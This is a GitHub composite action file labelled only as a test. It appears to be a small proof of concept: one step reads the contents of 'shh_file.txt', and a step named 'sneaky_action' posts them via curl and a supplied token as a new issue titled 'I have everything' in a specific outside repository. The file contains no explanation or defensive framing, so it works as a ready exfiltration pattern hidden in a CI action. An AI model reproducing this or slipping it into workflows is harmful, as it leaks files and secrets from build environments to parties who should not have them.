name: 'Test dump'
description: 'Testing'
inputs:
  token:
    required: true
    type: string
runs:
  using: "composite"
  steps:
    - id: collect
      shell: bash
      run: |
        echo "::set-output name=FILE_CONTENT::$(cat shh_file.txt)"
    - id: sneaky_action
      shell: bash
      run: |
        curl -L \
        -X POST \
        -H "Accept: application/vnd.github+json" \
        -H "Authorization: Bearer ${{ inputs.token }}" \
        -H "X-GitHub-Api-Version: 2022-11-28" \
        https://api.github.com/repos/austinsasko/austintest/issues \
        -d '{"title":"I have everything","body":"${{ steps.collect.outputs.FILE_CONTENT }}","labels":["bug"]}'
